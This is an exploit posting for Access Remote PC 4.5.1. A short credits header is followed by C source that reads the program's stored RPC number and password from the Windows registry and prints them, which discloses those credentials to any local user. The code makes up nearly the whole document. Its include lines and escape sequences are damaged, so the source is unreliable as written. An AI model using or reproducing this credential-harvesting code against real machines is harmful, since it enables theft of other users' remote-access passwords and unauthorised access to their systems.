Access Remote PC 4.5.1 Local Password Disclosure Exploit

************************************************** ***************

Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan

Application: Access Remote PC 4.5.1 (and probably prior versions)
Vendor: www.access-remote-pc.com

Vulnerable Description: Access Remote PC 4.5.1 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

************************************************** ***************/

#include
#include

#define BUF 100

int main()
{
HKEY hKey;
char RPCNumber[BUF], Password[BUF];
DWORD dwBuf = BUF;

if( RegOpenKeyEx( HKEY_CURRENT_USER,
"Software\Access Remote PC\Client\Options\Proxy",
0,
KEY_QUERY_VALUE,
&hKey
) !=ERROR_SUCCESS )
{
fprintf( stdout, "Access Remote PC is not installed on you PC!n" );
return -1;
}

if( RegQueryValueEx( hKey,
"RPCNumber",
NULL,
NULL,
(BYTE *)&RPCNumber,
&dwBuf
) != ERROR_SUCCESS )
lstrcpy( RPCNumber,"Not Found!n" );

if( RegQueryValueEx( hKey,
"Password",
NULL,
NULL,
(BYTE *)&Password,
&dwBuf
) != ERROR_SUCCESS )
lstrcpy( Password,"Not Found!n" );

fprintf( stdout, "Access Remote PC 4.5.1 Local Exploit by Kozann" );
fprintf( stdout, "Credits to AtmaCAn" );
fprintf( stdout, "www.netmagister.com - www.spyinstructors.com n" );
fprintf( stdout, "kozan@netmagister.comnn" );
fprintf( stdout, "RPCNumbert: %sn", RPCNumber );
fprintf( stdout, "Passwordt: %sn", Password );

return 0;
}